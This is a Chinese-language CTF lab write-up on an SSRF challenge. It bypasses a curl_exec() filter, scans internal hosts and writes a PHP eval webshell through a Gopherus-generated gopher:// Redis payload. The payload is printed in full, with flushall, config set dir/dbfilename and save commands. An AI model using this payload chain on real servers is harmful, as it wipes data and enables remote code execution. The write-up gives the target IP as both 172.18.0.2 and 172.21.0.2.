Web-ssrfme

SSRF介绍

SSRF（Server-Side Request Forgery）服务端请求为伪造，SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。

构建dockers环境

分析代码

通过审计代码可以看到它有curl_exec()函数
但是它将file，dict，127.0.0.1等进行了过滤很明显它是阻止我们访问内网的端口和内网的文件数据

首先我们来看看curl_exec()这个函数

它是PHP中用于执行一个cURL会话并获取服务器响应的函数。它是cURL库的一部分，cURL是一个功能强大的库，用于发送和接收数据，并与远程服务器进行交互。cURL支持多种协议，包括HTTP、HTTPS、FTP、SMTP等，使得它能够与各种类型的服务器进行通信，获取或发送数据。

通过过代码我们还可以看到只要有info这个参数就可以看到phpinfo()

所以我们这样写

再看看phpinfo()中有什么可用的信息

这里可以看到它将本地ip地址暴露出来，那么就绕过之前的限制，我们用http协议先试下能不能探测出端口，因为探测端口我们在前端看不出什么信息，那使用bp快速爆破下，查看报文的长度看能否爆出一些信息

抓包

抓包发送到爆破模块

可以看到只有80端口开放这对我们来说没什么用
但是在正常项目中不可能只有一台主机，所以继续使用bp扫描一下

可以看到有一个IP为172.18.0.2的主机

继续扫描这太主机的端口

可以看到它开放了6379这个端口

写木马

那么接下来就传webshell就可以了，在172.21.0.2的物理路径下传webshell，那么他的物理路径是啥，不知道，只能猜或者测试一般情况下，都是放在/var/www/html下面，但不保证他会不会改，一般都是怕麻烦不会改的

使用gopher工具

下载地址：GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various servers

下载并解压后运行install.sh文件

它使用的是python2使用这里的目录要么是猜要么扫描或者默认路径

先把它生成的内容拿出来看看
解码后得到

gopher://127.0.0.1:6379/_*1
$8
flushall  #这个命令清空了 Redis 数据库中的所有数据，清除了所有的键值对
*3
$3
set   #命令用于向 Redis 写入一个键值对，这里的键是 1，值是 PHP 代码片段
$1
1
$31


<?php eval($_POST['1']); ?>


*4
$6
config  #config set dir /var/www/html/upload：将 Redis 的保存目录设置为 
         /var/www/html/upload，这是一个 Web 服务器可以访问的目录。
$3
set
$3
dir
$20
/var/www/html/upload 
*4
$6
config   #将 Redis 的数据库文件名设置为 shell.php。这意味着当 Redis 保存数据时，它会在 dir 指 
         定的目录下生成一个名为 shell.php 的文件
$3
set    
$10
dbfilename
$9
shell.php
*1
$4
save #命令强制 Redis 将内存中的数据保存到磁盘。由于 Redis 现在的保存目录是 
     /var/www/html/upload，文件名是 shell.php，所以会在 /var/www/html/upload 目录下生成一个包 
      含恶意 PHP 代码的 shell.php 文件。

接下来我们将生成后的payload进行二次编码

然后访问

之后我们包含进来

成功执行

之后我们只需要将我们的phpinfo()换成命令执行即可

二次编码后访问成功获取flag